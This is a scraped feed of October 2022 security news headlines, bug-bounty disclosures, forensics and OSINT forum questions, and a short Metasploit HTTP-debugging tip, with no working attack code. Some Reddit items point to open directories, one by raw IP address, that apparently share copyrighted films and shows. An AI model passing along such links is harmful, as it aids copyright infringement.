    An introduction to MiraclePtr, a UAF exploit mitigation technique
    Author: MoYun Technology VLab Team; Original link: https://mp.weixin.qq.com/s/oJPYrY84yqEa0FrezG-QPw On September 13, 2022, the Google security team published an article on its security blog about MiraclePtr, describing the Google Chrome security team's progress in mitigating UAF exploitation. Since MiraclePtr does not refer to a single smart-pointer technique, but encompasses the Google security tea...
  • Open

    Why do Deserialization Vulnerabilities occur?
    Introduction Continue reading on InfoSec Write-ups »
    Harley Malware: New Attack on Android Devices
    No content preview
  • Open

    Hello World under the microscope
    (This article, written by Adam Sawicki, Mateusz Jurczyk and Gynvael Coldwind, was originally published in Polish in the Programista magazine in February 2022; Polish version: PDF, printed) Hello World under the microscope The first step on the classic education path of future programmers is creating a program that prints – most often in the terminal – “Hello, World!”. The program itself is by definition trivial but what happens after it is launched is not – not entirely at least. In this article, we will trace the execution path of the "Hello World" micro-program written in Python and run on Windows, starting from a single call to the high-level print function, through the subsequent levels of abstraction of the interpreter, operating system and graphics dri…

  • Open

    ✪ All about JWT attacks (tools included) !!!
    JWT is a token system that was originally created to make it possible to verify authorization. Although this may be used for… Continue reading on Medium »
    [Hacking Banks] Broken Access Control Vulnerability in Banking application [PART I]
    This is the part I of the story about finding a critical Vulnerability in a banking mobile app that allows attackers to obtain full user… Continue reading on Medium »
    The easiest bug to get a Hall of fame from a Billion dollar company.
    GeHealthcare, is a company that many might not have heard of. Continue reading on Medium »
    Finding P1 Vulnerabilities: A Step by Step Guide
    Disclaimer: This article is for informational purposes only. Do not attempt to maliciously use information in this article to harm or… Continue reading on Medium »
    Exceptional Tool? Nginxpwner to Test and Run for Nginx Security and Bug Bounty
    🙏, Will see How to Install, Test and Run Nginxpwner on Kali Linux. Continue reading on Medium »
    Bug Bounty — The Future of Security
    Bug Bounty Continue reading on Medium »
    Front-Run a Smart Contract
    Blockchain data are theoretically immutable. It is offered as an inherent feature to safeguard data integrity from attackers. Continue reading on Bug Zero »
    Different Types of Hackers to be Aware
    A Definitive Guide Continue reading on Bug Zero »
  • Open

    New macOS vulnerability lets malicious applications bypass security checks
    Article URL: https://www.scmagazine.com/analysis/application-security/new-macos-vulnerability-lets-malicious-applications-bypass-security-checks Comments URL: https://news.ycombinator.com/item?id=33157411 Points: 4 # Comments: 0
    Zimbra remote code execution vulnerability actively exploited in the wild
    Article URL: https://portswigger.net/daily-swig/zimbra-remote-code-execution-vulnerability-actively-exploited-in-the-wild Comments URL: https://news.ycombinator.com/item?id=33155521 Points: 1 # Comments: 0
  • Open

    Give me your username. I'll tell you who you are!
    Tools for online social media research in Germany (Part 1) Continue reading on Medium »
    You’re better off without a phone or electronic gadget.
    Have you ever wondered, "How much information your phone or PC knows about you?” Continue reading on Medium »
    (Aircraft Osint) How I tracked an aircraft with just a picture of it.
    What is the correct location and information of this aircraft?? Continue reading on Medium »
    October Mentoring Fest — Data Visualization and Analysis for Cybercrime Investigation
    Speaker: Dedy Hariyadi Continue reading on Medium »
  • Open

    Stored XSS in the ticketing system
    TikTok disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1694037 - Bounty: $1000
    Denial of service via malicious Content-Type
    Fastify disclosed a bug submitted by bitk: https://hackerone.com/reports/1715536
    CORS Misconfiguration on trust.yelp.com
    Yelp disclosed a bug submitted by ajayjachak: https://hackerone.com/reports/1716286
  • Open

    Post Compilation
    For this post, I'll throw out a bunch of little snippets, or "post-lets", covering a variety of DFIR topics rather than one big post that covers one topic. What's Old Is New Again During Feb, 2016, Mari published a fascinating blog post regarding the VBAWarnings value. That was a bit more than 6 1/2 yrs ago, which in "Internet time" is several lifetimes.  Just this past September, Avast shared a write-up of the Roshtyak component of Raspberry Robin, where they described some of the techniques used by this malware, including checking the VBAWarnings value as a means of "detecting" virtual or testing environments. Getting PCAPs When I've been asked on-site (or remotely), it's most often been after an incident has happened. However, that doesn't mean that I shouldn't have a means available fo…
  • Open

    GooFuzz — The Power of Google Dorks
    GooFuzz is a script written in Bash that uses advanced Google search techniques to obtain confidential information from… Continue reading on Medium »
    TryHackMe Pentest Room: Attacktive Directory
    Windows Active Directory runs more than 90% of the businesses around the globe. AD is notorious for shipping with unpatched… Continue reading on Medium »
    Agile Security Operations
    Engineering for agility in cyber defense, detection, and response Continue reading on Medium »
  • Open

    Any decent free tool to restore image to media
    Does anyone know of freeware that supports restoring common forensic images formats onto a media such as a hard drive or flash drive? Want to avoid linux atm. submitted by /u/MDCDF [link] [comments]
  • Open

    Cool way to detect notty malicious ssh sessions
    https://twitter.com/gabriele_pippi/status/1579480547499573248?t=dAWsJzRS1-2tYdE7TJQoOQ&s=19 submitted by /u/jimiilfurbo [link] [comments]
    Evil Twin Enterprise WiFi Network using Hostapd-Mana
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Is anyone using the new INTEL ARC GPUs for cracking hashes?
    The new Intel Arcs have a very competitive price point with Nvidia. Generally I'm a believer in you get what you pay for. But Nvidia is gouging, straight up. So, if you've been using Arcs for cracking what are your thoughts? submitted by /u/Troglodyte_Techie [link] [comments]
    Is it good practice to overwrite before deleting Reddit posts? Any programs to automate this for privacy sake?
    Has this been defeated by these illegal snooping archives? These creepy archive sites can archive doxx information for stalkers to find. submitted by /u/kingofallnorway [link] [comments]
    Best pentesting vendor - Cobalt vs Getastra
    I'm looking for a pentesting vendor for a web platform. This is for SOC 2 & ISO27001 compliance. Our choices so far have come down to: Cobalt Getastra Beaglesecurity Cobalt by far seems to be the market leader, but when we go through the featuresets of its competitors (at least going off their websites), they pretty much all offer the same things we need. Given the massive price difference (cobalt is magnitudes more expensive), are there compelling reasons people seem to overwhelmingly favour Cobalt? Does it offer value-add that justifies its steep cost in comparison to other options? submitted by /u/Lostwhispers05 [link] [comments]
    If my application's APIs use SSL as a baseline, as well as auth tokens for most requests, how secure can it be considered?
    Looking at service providers like Cobalt and Getastra, one of the services they offer is API security testing. What makes an API secure or insecure? Maybe it was naive, but I thought SSL usage covered us on the security part. What do pentesters test for to gauge API security outside of SSL usage? submitted by /u/Lostwhispers05 [link] [comments]
  • Open

    Persistent PHP payloads in PNGs: How to inject PHP code in an image and keep it there!
    submitted by /u/Gallus [link] [comments]
    The Google plasma globe affair of 2012
    submitted by /u/nf-- [link] [comments]
    GitLab: RCE via github import
    submitted by /u/jeandrew [link] [comments]
    A simple shell script (almost) POSIX for mail security checks
    submitted by /u/ljulolsen [link] [comments]
  • Open

    SecWiki News 2022-10-10 Review
    How I test Cache-related vulnerabilities by 蓝色淡风. For more of the latest articles, visit SecWiki
  • Open

    Accidental Account takeover
    No content preview
    Roadmap to Cybersecurity in 2022, Full-Read SSRF, IDOR in GraphQL, GCP Pentesting, and much…
    No content preview
  • Open

    Freedom, Love, and Fun: The Ingredients That Go into X
    Time to talk about X from director Ti West. Spoilers littered throughout. Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Iranian protesters hijack a state TV live broadcast; Japan's IPA releases the 2022 "Information Security White Paper"
    Over the past two years, more than nine in ten (91%) cybersecurity professionals have faced mental health challenges at work.
    Vulnerabilities found in IKEA smart lighting system could make bulbs flicker or reset to factory settings
    Researchers found two vulnerabilities in IKEA's smart lighting system that allow an attacker to take control of the system and make bulbs flicker rapidly, and may also cause a factory reset.
    Intel confirms Alder Lake BIOS source code has leaked
    Intel has confirmed to the well-known hardware site Tom's Hardware that the UEFI BIOS source code for its 12th-generation Core processors, Alder Lake, has leaked.
    Top 10 CI/CD Security Risks (Part 1)
    CI/CD environments, processes and systems are the core of modern software organizations. They carry code from development engineers' workstations to production. Combined with the rise of DevOps and microservice architectures, CI/CD systems and processes have reshaped the engineering ecosystem: technology stacks are more diverse, both in coding languages and in the technologies and frameworks further adopted in the pipeline (e.g. GitOps, K8s). New languages and frameworks are adopted ever faster, with no major technical barriers. The use of automation and infrastructure-as-code (IaC) practices has increased. Third parties, whether
    Three cities, four highlights | Limited registration for CIS 2022 conference attendees opens in each city
    November 16, see you in Shanghai!
  • Open

    Debugging HTTP in Metasploit
    When using MSF, there are times when you want to confirm whether the attack payload was actually sent correctly. There are also times when, having tested with a module, you need to show it as an HTTP request so that developers and others can understand it easily. Today I want to talk about the methods you can use when HTTP debugging is needed during Metasploit module testing. HttpTrace HttpTrace is one of the default options that HTTP-related MSF modules have; if you look at the settings supported by a module that uses HTTP, you will see HttpTrace among them. You can see the values that can be set with set 😃 To test simply, let's proceed with the scanner/http/title module. Unless HTTPTrace has been explicitly set to true, only the result intended by the module author is shown, as below. If you set HTTPTrace to true here, you can see the HTTP Req/Res when the module runs. set HttpTrace true HeadersOnly If you only need header information, you can additionally set HttpTraceHeadersOnly to see just the headers. set HttpTraceHeadersOnly true Interact Burp/ZAP Using the two settings below, you can make the requests issued by Metasploit modules go through a proxy. set PROXIES HTTP:127.0.0.1:8090 set ReverseAllowProxy true # Actually the two options above are mostly used for tunneling so that MSF # can communicate smoothly when pivoting (Proxy Pivoting). # But they are perfectly usable for debugging too :D Modify HTTP You can also have each module's HTTP requests modified into the form we want before they are sent. HTTP*-related...

  • Open

    Announcing the Big Bug Bounty by Thunder Farms | Earn up to $200
    Do you like to pick out flaws and brag about them? This time, you can even get paid for it! Sounds great? Of course, it does. Continue reading on Medium »
    Accidental Account takeover
    Hello Security Community, Continue reading on InfoSec Write-ups »
    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    Hi! My name is Hashar Mujahid. And today we are going to learn what OS command injections are and how we can exploit them. Continue reading on InfoSec Write-ups »
    OverTheWire : Natas (Level 0–10)
    This is a fairly interesting collection of challenges that helps to get an idea of Web Security. Continue reading on System Weakness »
    Sql Injection for Beginners using Sqlmap
    Hello Learners, so let’s start with my first blog it is just based on a topic you already knew SQL injection before that let me just… Continue reading on Medium »
    How to earn money from software bugs?
    In this article we will see how I earned my highest bounty and what the vulnerability was that allowed me to earn… Continue reading on Medium »
    How Machine Learning Aids in Creating Secure Systems
    It may be a surprise for some to know that machine learning is used in cybersecurity, but there are many ways in which Machine Learning in… Continue reading on Medium »
    Fuzzing for Bug Bounty Hunting
    Testing for vulnerabilities by feeding input one by one manually can be hectic. Continue reading on Medium »
  • Open

    Anyone posted this...
    Marked it as nsfw because not been through it all... Link... submitted by /u/xanderTgreat [link] [comments]
    Some TV and many movies http
    submitted by /u/littlepreptalk [link] [comments]
    Photos from Yakutsk. Includes Russian mining wizards.
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    Review of the Webinar on Data Visualization and Analysis for Cybercrime Investigation
    In Indonesia's cyberspace, there are many components, just as in the cyberspace of other countries. Of course, with the existence of cyberspace… Continue reading on Medium »
    SPY NEWS: 2022 — Week 40
    Summary of the espionage-related news stories for the Week 40 (October 2–8) of 2022. Continue reading on Medium »
    Pyramid Of Pain TryHackMe
    Hash Values (Trivial) Continue reading on Medium »
  • Open

    SecWiki News 2022-10-09 Review
    Malicious Tor Browser installers are being distributed via YouTube by Avenger; A certain cloud WAF challenge write-up by ourren; OrcaC2: a multi-function C&C framework based on encrypted WebSocket communication by ourren. For more of the latest articles, visit SecWiki
  • Open

    Everything About Path Traversal Vulnerability
    Introduction Continue reading on InfoSec Write-ups »
    Finding of Directory/Path in Linux
    No content preview
    njRAT Malware Analysis
    No content preview
    Browser in the Browser Attack
    No content preview
    CVE-2022–40684: New Authentication Bypass Affecting FortiGate and FortiProxy
    No content preview
    Best CTF Platforms
    I have compiled a list of Red Team/Blue Team Capture The Flag Platforms to test your skills on. Continue reading on InfoSec Write-ups »
    Full Company Building Takeover
    No content preview
    EXPLOITING OS COMMAND INJECTION VULNERABILITIES
    No content preview
  • Open

    Getting served a malicious update - interesting techniques, my slip up, and lessons learned: a short blog post
    submitted by /u/CuckooExe [link] [comments]
  • Open

    A hands-on penetration test of a certain group company
    Starting the penetration from information gathered on the official website, chaining one vulnerability into the next to obtain access in one go.
    Thoughts and practice on enterprise supply chain security (Part 2): third-party technology management and a software supply chain framework
    Third-party technology refers to the technical tools, interfaces and components involved in technology adoption and implementation; because they lean toward technical application, they are often absent from an enterprise's procurement lists and plans.
    FreeBuf Morning Report | IKEA smart lighting system has flaws; Intel 12th-generation processor source code leaked
    With just a single malformed Zigbee frame, an attacker can take control of certain IKEA smart lighting devices, leaving users unable to turn off the lights.
    A first look at Spring in-memory webshells: Controller (In-memory webshell series, part 9)
    Implementing an in-memory webshell at the Controller layer of the Spring framework
    RSAC 2022 talk recap: OT reverse engineering
    Operational technology (OT) is a class of hardware and software used to monitor and control the performance of physical devices, used mainly in industrial control systems across manufacturing, transportation, public utilities and similar sectors.
    Chip maker ADATA denies being attacked by the RansomHouse group
    Taiwanese chip maker ADATA has denied a recent cyberattack from the RansomHouse group.
    "Information Security Technology: Software Supply Chain Security Requirements" (Draft for Comment) released
    The Security Requirements set out the protection goals for software supply chain security and specify security requirements for organizational management and supply-activity management of the software supply chain.
    4 million records of 2K Games user data are being sold on the dark web
    On a hacker forum, 2K's game support database has been listed for sale, including user IDs, usernames, emails, real names and other information, totaling 4 million records.
  • Open

    Email Address Exposure via Gratipay Migration Tool
    Liberapay disclosed a bug submitted by suprnova: https://hackerone.com/reports/1727044 - Bounty: $100
    Relative Path Traversal vulnerability in fabric-private-chaincode
    Hyperledger disclosed a bug submitted by bhaskar_ram: https://hackerone.com/reports/1690377
  • Open

    What does this IP camera review mean for your security?
    Hi, I'm considering this FOSCAM d4z IP cam but this worries me: When I bought this IP camera, I was looking forward to a high quality device, with a strong and experienced brand backing it. Turns out that I was wrong: while the hardware is impeccable (very good quality build), the software is outrageous. In order to access this IP Camera's web UI you have to: 1. be running a Windows/Mac OS (no Linux/BSD! Sorry, all the network people out there!) 2. install a software that the IP Camera downloads from S3 3. Said software installs a background service on your Windows (that's where I tried it) system, opening a websocket server listening for port 50000 and 6129 (wow, really?) 4. Once your "malware" is running locally, you can finally log into your webcam, if that doesn't cause your entire host system to reboot (does so for me on two different machines) So in practice: 1. The IP Camera does not function as an IP Camera 2. The "IP Camera" leads to Windows crashes 3. The "IP Camera" is a security threat from day 1 I am waiting to talk to Foscam support to understand if this is something they can fix (by giving me a firmware that is not intrusive), or if I should just ship it back and mark the company as untrustworthy submitted by /u/chipolatavanmona [link] [comments]
    Does anyone know any good tools or practices to test for virus and/or malware in csv files that will be stored into our internal storage?
    Storage in the cloud submitted by /u/herbertisthefuture [link] [comments]
  • Open

    CVE-2022-41343: Remote Code Execution in Dompdf library via Phar deserialization
    Article URL: https://tantosec.com/blog/cve-2022-41343/ Comments URL: https://news.ycombinator.com/item?id=33138839 Points: 1 # Comments: 0
  • Open

    Fuzzing for Bug Bounty Hunting
    Testing for vulnerabilities by feeding input one by one manually can be hectic. Continue reading on Medium »
  • Open

    A career in Digital Forensics
    Hey all - just querying what a career in the Digital Forensics space may look like and if there's any potential for career progression and the ability to earn more money as a person's experience increases. I know there's ample work within the government and law enforcement area, but is there more opportunity in the private sector? Currently, I'm attempting to gain employment with a LEA, learn as much as I can and do courses, and potentially move into the private sector in 10-15 years time. I have previously (and very limited) worked in a role where I used Cellebrite, XRY and a few other tools. I'm hoping to hear about people's experiences in these types of roles, and if it's 'worth it'. Thank you. submitted by /u/OkGrape5530 [link] [comments]

  • Open

    github.com/s0rg/crawley
    crawley project: https://github.com/s0rg/crawley just released v1.5.0: https://github.com/s0rg/crawley/releases/tag/v1.5.0 new features: js endpoints parser proxy auth crawl ignore list submitted by /u/Swimming-Medicine-67 [link] [comments]
    Google Drive TV Shows
    TV Shows Anime Grab it while it lasts, cheers submitted by /u/blinkydonut [link] [comments]
    Harry Potter, Pirates of Caribbean, Assassin's Creed and some other movies
    Link:- http://167.114.174.132:9092/movies/batch225/ Directory of Harry Potter, Pirates of Caribbean, Assassin's Creed and some other movies, with okayish download speed https://preview.redd.it/7j9zerzzxjs91.png?width=1920&format=png&auto=webp&s=62467bfe6753796a8e3a20bd11a8d3bba760d954 submitted by /u/narayan9deep [link] [comments]
    Movies, 1-2gb file size, good speeds. English, no subs.
    submitted by /u/draebor [link] [comments]
    Many PDFs
    submitted by /u/ilikemacsalot [link] [comments]
  • Open

    Belkasoft Evidence Center - Can't create new case, database mismatch
    Hey all- Trying to open a new case in Belkasoft Evidence Center (BEC), and when attempting to do so, I'm getting the error- "Database version mismatch", saying the case I'm opening is created with an older version of Evidence Center. Can anyone offer me some guidance to remedy this? submitted by /u/thenyx [link] [comments]
    Need Guidance!
    So I’m currently working towards my B.S. in Cyber Security and have roughly 1 year and 5 months left. I also just got hired on as an intern for help desk throughout the local school districts. This will help me of course to learn the basics and to get my foot in the door of the I.T. world. My schooling will cover around 11 certifications but I know hands on experience is always at the top for landing a job. I’ve been researching a lot into computer forensics and would like to make this my permanent career. What steps would you recommend I take first? I was given some great books to get started on reading. Should I also go for the CFCE or GCFE? I know both certs take a lot of knowledge, time, and prerequisites to obtain. I was thinking I could accomplish these things during my schooling timeframe and then attempt to apply after graduating and hopefully by then I will have some time in help desk which is still some form of experience. I would like to work for the government on criminal cases to be exact. What are your thoughts based off my current plan and progression? I don’t know anyone personally in the I.T. field so any advice is definitely needed and appreciated! submitted by /u/matty0100 [link] [comments]
  • Open

    Snapchat data access?
    Hey there, I’ve got a question I’m trying to find some clarity with in relation to Snapchat. Whilst photo and text messages are usually deleted instantly on the app, it’s clear that Snapchat can use the data obtained from these messages to ‘improve their services’ and provide such data to their service partners. Therefore, if you were to send compromising NSFW content via photo or text message on Snapchat, would they have the right to sell that content on? Whilst I’m doubtful that they would, considering this would mean billions of personal ‘snaps’ being sold, I'm worried about the internal security of Snapchat in relation to these matters and was looking for clarity. If I was to send such content to an individual, and provided neither of us saved the content, what would be the potential ramifications of this? I’m a layman to these issues and have myself shared content I’d rather not have on Snapchat in earlier years, and have been worried with the idea that such content is circulating after being sold or shared by Snapchat. Therefore, I’d just like to ask what is the realistic likelihood that this is the case? Thank you for your time submitted by /u/ApexUnited123 [link] [comments]
    Any familiarity with MGLNDD Scans From across the internet
    Looked through my server logs and I saw a MGLNDD_"IP Address"_"Port number"\n. Are they used for malicious intent or reconnaissance? submitted by /u/ZCB_Khaos [link] [comments]
  • Open

    Beginner’s guide to start with OSINT
    OSINT is something one can get into irrespective of whether you know other aspects of hacking or not. Whether you have a working… Continue reading on Medium »
    Geolocating conflicts in Fall 2022 with various methods, and a preview of the new tool Atlos
    Image by Ingo Joseph, Pexels.com Continue reading on Medium »
  • Open

    SecWiki News 2022-10-08 Review
    Thoughts on building a cyberspace strategic early-warning system by ourren; Cloud-Native Security Series (Part 1) | Building a Kubernetes cloud-native target range by tinyfisher; A first look at ThinkPHP 5.1 applications by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    What can we learn from leaked Insyde's BIOS for Intel Alder Lake
    submitted by /u/hardenedvault [link] [comments]
  • Open

    [Vulnerability Bulletin] FortiGate and FortiProxy authentication bypass vuln...
    Fortinet recently fixed an authentication bypass vulnerability (CVE-2022-40684) in FortiGate firewalls and FortiProxy web proxies that could allow an attacker to execute ... on a vulnerable device
  • Open

    Toyota publicly apologizes after information on roughly 300,000 users is leaked
    A security incident in Toyota Motor Corporation's T-Connect service may have allowed attackers to steal the personal information of nearly 300,000 users.
    FreeBuf Morning Report | LofyGang mass-poisons open-source software; hackers steal more than $570 million from Binance
    The LofyGang threat group is using more than 200 malicious NPM packages and thousands of installs to steal credit card data and gaming and streaming accounts, then sells the stolen credentials and loot on underground hacking forums.
    19-year-old arrested for using data leaked from Optus to extort victims
    The Australian Federal Police (AFP) arrested a 19-year-old from Sydney who is accused of attempting to use data leaked from Optus at the end of last month to extort victims.
  • Open

    Cross-Site Scripting Attacks (XSS) And Website Security
    What is a Cross-site scripting attack and how can we secure our website? Continue reading on Medium »

  • Open

    Scanbox Threat Actors Checking for Kaspersky
    Does anyone have any idea why threat actors using Scanbox would run a plug-in that checks specifically for Kaspersky security appliances? All of the intel I have read says Scanbox checks for Kaspersky Internet Security but not really why that is done. Recent campaigns with targets in Australia and Malaysia have been attributed to threat actors associated with China. submitted by /u/Guitarware [link] [comments]
    Is it safe to use a computer potentially infected with a RAT if it is completely disconnected from the internet?
    My grandmother’s computer recently got infected with a RAT (not exactly sure, but it’s better to be safe than sorry), and I’m extremely wary of her powering it on since she doesn’t even know what operating system she has. submitted by /u/Very_Bi_Badger [link] [comments]
    Cybersecurity Department for MSP
    Anyone familiar with starting a cybersecurity department for their IT company or why it would even be needed? And what metrics could be collected to substantiate its existence? submitted by /u/ReturnOpen [link] [comments]
    How to identify the source of a bruteforce?
    I have a lot of alerts like below: AV - Alert - "1664927164" --> RID: "18130"; RL: "5"; RG: "windows,win_authentication_failed,"; RC: "Logon Failure - Unknown user or bad password."; USER: "(no user)"; SRCIP: "-"; HOSTNAME: "(dc01) 10.0.0.1->WinEvtLog"; LOCATION: "(dc01) 10.0.0.1->WinEvtLog"; EVENT: "[INIT]2022 Oct 05 07:46:02 WinEvtLog: Security: AUDIT_FAILURE(4625): Microsoft-Windows-Security-Auditing: (no user): no domain: DC01.company.int: An account failed to log on. Subject: Security ID: S-1-0-0 Account Name: - Account Domain: - Logon ID: 0x0 Logon Type: 3 Account For Which Logon Failed: Security ID: S-1-0-0 Account Name: sam Account Domain: Failure Information: Failure Reason: %%2313 Status: 0xc000006d Sub Status: 0xc0000064 Process Information: Caller Process ID: 0x0 Caller Process Name: - Network Information: Workstation Name: SERVER Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: NtLmSsp Authentication Package: NTLM Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon request fails. It is generated on the computer where access was attempted.[END]"; Well, as you can see, there is no useful information to understand from which source the attacker is trying to bruteforce. The network address is empty. I can see the workstation name, but we don't have this workstation in our network, so it's external. Probably we have a public resource that has integrated AD creds, but I'm not sure. So, how can I find the source? The Windows Event log doesn't have such information. Maybe I need to look at other data sources? Or configure additional data sources to see from where the attacker is trying to bruteforce? Any ideas? I'm stuck on this. submitted by /u/athanielx [link] [comments]
    Is it possible to run multiple VMs in Proxmox, each with different public IPs (through VPN)?
    I'm looking to spin up a few virtual machines in my Proxmox environment. Each one would need to have a different public IP address when connecting out to the internet. Is this possible to do on my local network? I imagine I have to use some sort of VPN service for this on each endpoint. On a side note, I'm looking to deploy and configure these VMs using Terraform and Ansible. Any advice with this approach is welcome. Thanks in advance! submitted by /u/BurnerAccountNo2 [link] [comments]
    GIAC Gold certifications going away?
    I just noticed this page was written in the past tense, and saying the gold programme was active until 2022. https://www.giac.org/gold-overview/ But I can't find any more information, any announcement or something. Are they closing this programme? Is there any replacement or is there only one level of certs now? Does it mean you can just take GSE after you get your three GSEC GCIH and GCIA? submitted by /u/ProperWerewolf2 [link] [comments]
  • Open

    Vulnerabilities in Online Payment Systems
    Years ago I was involved in security research and I was a consultant for some tech companies in my country. During that time I found many… Continue reading on Medium »
    Exploiting Broken Access Control Vulnerability
    Access control (or authorization) is the application of constraints on who (or what) can perform attempted actions or access resources… Continue reading on Medium »
    [Writeup] Vault game — Hats Finance CTF#2
    This is my solution for Vault-game from Hats Finance making me one of winners with rewards of 1000 DAI and a NFT. Continue reading on CoinsBench »
    Pico CTF 2021 (Web Exploitation) — Get aHead & Cookies
    GET aHEAD (20 Points) Continue reading on System Weakness »
    Insecure Comments
    Hi All, Continue reading on Medium »
    AMA session recap about the Q Bug Bounty campaign with Immunefi
    On September 28th, we ran our first AMA session in Discord. The topic was our ongoing Bug Bounty program in collaboration with Immunefi… Continue reading on Q Blockchain »
    Command ‘go’ not found
    Hi All, Greetings…!!! Continue reading on Medium »
    Cybersecurity Vs Social Engineering: What’s the Difference?
    Continue reading on Bug Zero »
    Software Development Life Cycle
    What is Software? Continue reading on Bug Zero »
    PSScriptAnalyzer: SAST Tool for PowerShell Script
    PowerShell Script Analyzer, also known as PSScriptAnalyzer, is a static code analysis tool (SAST tool), which examines the PowerShell… Continue reading on Medium »
  • Open

    Review #320: Los Angeles, X
    #320: Los Angeles, X Continue reading on Medium »
  • Open

    Red Team Recon
    Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. Continue reading on Medium »
  • Open

    Linux Security — LSM (Linux Security Modules)
    submitted by /u/boutnaru [link] [comments]
    Disclosure time for Zoneminder findings
    submitted by /u/trenchesofit [link] [comments]
  • Open

    Tools for DMG creation of Macbook Pro
    Hi there, Likely a very vague and/or stupid question, but I need to create an image of two MacBooks, one an M1, 2020 running 12.3.1 Monterey, and one a MacBook Pro 15 inch, 2018 with a T2 chip. I'm very green to this field, and after some preliminary research, this is clearly not as easy as it initially seemed. I was hoping I might be able to just use a tool like dd to get the dmg images, but it seems like there are quite a few hoops to jump through for T2 and M1 MacBook Pros. Just wondering if anyone has any advice regarding tools/processes to just get a DMG image from both these Macs? submitted by /u/Wittinator [link] [comments]
    USB History for Catalina
    I used AXIOM to collect a remote image from a MacBook Air. I thought I grabbed all the system files but it's not showing any USB history when the endpoint monitoring tool showed there was activity in the past 6 months. Where is this normally located? submitted by /u/CrazyKitty2016 [link] [comments]
  • Open

    OhSINT
    THM | Writeup Continue reading on Medium »
    OSINT in metaverse
    Metaverse!!! A trending topic, right?? Before understanding how to perform OSINT in the metaverse, let's understand what the metaverse is!! Continue reading on Medium »
  • Open

    Assorted music, movies, series and software
    Everything is in labelled folders. The software is a few years old. http://167.114.174.132:9092 submitted by /u/D5LR [link] [comments]
  • Open

    SecWiki News 2022-10-07 Review
    No news updates today. For more of the latest articles, visit SecWiki
  • Open

    FreeBuf Morning Report | UK Prime Minister's personal phone number exposed; Toyota apologizes: about 296,000 customer records leaked
    Toyota Motor said it found that 296,019 customer records in its T-Connect service, including email addresses and customer numbers, may have been leaked.
  • Open

    The Past and Present of Situational Awareness (Part 1)
    This series of articles will cover, over several parts, the development of situational awareness and its practice in industry. Origin and definition: the concept of situational awareness originated in military theory, as early as the Spring and Autumn period … Continue reading The Past and Present of Situational Awareness (Part 1) →
  • Open

    CyRC Vulnerability Advisory: CVE-2022-39064 IKEA TRÅDFRI smart lighting
    Article URL: https://www.synopsys.com/blogs/software-security/cyrc-advisory-ikea-tradfri-smart-lighting/ Comments URL: https://news.ycombinator.com/item?id=33118758 Points: 1 # Comments: 0
  • Open

    The Importance of Infrastructure as Code Security Scanning
    No content preview
  • Open

    Speaking Engagements
    Every now and again, I have a need (re: "opportunity") to compile a list of recorded speaking events. The reasons vary...there's a particular message in one or more of the recordings, or someone wants to see/hear what was said, or it's more about showing examples of my presentation style. For the sake of simplicity, I thought I'd just take the list I'd compiled in Notepad++ and create a blog post. Huntress TradeCraft Tuesdays Bang For Your Buck: How Hackers Make Money - Ethan and I discuss various means by which threat actors monetize their activities, which is (in many cases) their ultimate goal. We also present some steps you can take to inhibit or obviate this. Digital Forensics (or Necromancy) - Jamie and I talk about digital forensics with our special guest, Dr. Brian Carrier ResponderCon  Here's a link to my slides; I'll post a link to the recorded talk once it's available. Podcasts I recently participated in the Horangi "Ask A CISO" podcast (link here, and on Spotify). Older Events/Recordings RVASec 2019 presentation Nuix Unscripted A couple of podcasts via OwlTail Down the Security Rabbithole podcast from 2017 A podcast from 2009 CyberSpeak podcast from 2006 (24 Sept, 1 Apr)
  • Open

    [Translation] Fifty Years of Traffic Control (TC): the Evolution from Buffer-Queue-Based to Timestamp-Based (EDT) (Google, 2018)
    Translator's preface: This article combines translations of the technical portions of two Google talks from 2018. Both cover the same subject but with different emphasis: Netdev 2018: Evolving from AFAP: Teaching NICs about time takes the more macro view and explains the causality and historical evolution better; OCT 2018: From Queues to Earliest Departure Time is more technical and detailed. Some Linux/Cilium/BPF-related content was added during translation where appropriate. Given the translator's limited ability, omissions or errors are unavoidable; if in doubt, consult the original. The translation follows. Translator's preface 1 Origins of networking 1.1 Technical requirements and the origin of networks 1.2 Proprietary protocols and vendor lock-in 1.3 Problems with early vendor networking solutions 1.4 The TCP/IP protocol model 1.4.1 IP: best effort delivery 1.4.2 TCP: eventual delivery 1.4.3 Summary 2 Network transmission 2.1 Technical requirement: the faster the better (or as fast as possible, AFAP) 2.2 TCP send mechanism: limits how much is sent, not how fast 2.3 Queue-based traffic shaping 2.3.1 How a shaper works: the token bucket queue as an example 2.3.2 Historical contribution of the AFAP shaper: supporting a 10000x TCP/IP speedup over the past 25 years 2.3.3 Problems faced: latency and packet loss 2.3.4 Ways to mitigate/avoid packet loss (before 2012) 2.3 Bandwidth Moore's law stalls (after 2012) 3 Some innovations from Google's networking team 3.1 Change of approach: from queue-based to time-based 3.2 Some published papers 4 From queue-based to timestamp-based: qdisc/EDT in detail 4.1 Based on…

  • Open

    What is a Malware Attack?
    A malware attack is the act of injecting malicious software to infiltrate and execute unauthorized commands within a victim’s system without their knowledge or authorization. The objectives of such an attack can vary – from stealing client information to sell as lead sources, obtaining system information for personal gain, bringing a site down to stop business or even just placing the mark of a cyber-criminal on a public domain. Malware attacks have been known to be executed by disgruntled employees, competing businesses, or even cyber-terrorist organizations. Continue reading What is a Malware Attack? at Sucuri Blog.
  • Open

    Securely Implementing IdP-initiated SAML2 Login
    submitted by /u/benarent [link] [comments]
    Unpatched vulnerability on Zimbra (again!) - symlink abuse in cpio
    submitted by /u/iagox86 [link] [comments]
    Uncovering a Fake Recruiter Scam with OSINT techniques
    submitted by /u/smicallef [link] [comments]
    Fully loaded: testing vulnerable PyYAML versions
    submitted by /u/iterablewords [link] [comments]
    CVE-2022–36635 — A SQL Injection in ZKSecurityBio to RCE
    submitted by /u/sp1d3rr [link] [comments]
    Release EMBA firmware analyzer v1.1.2 - Knight Rider Edt.
    submitted by /u/_m-1-k-3_ [link] [comments]
    Comparing Semgrep and CodeQL
    submitted by /u/nibblesec [link] [comments]
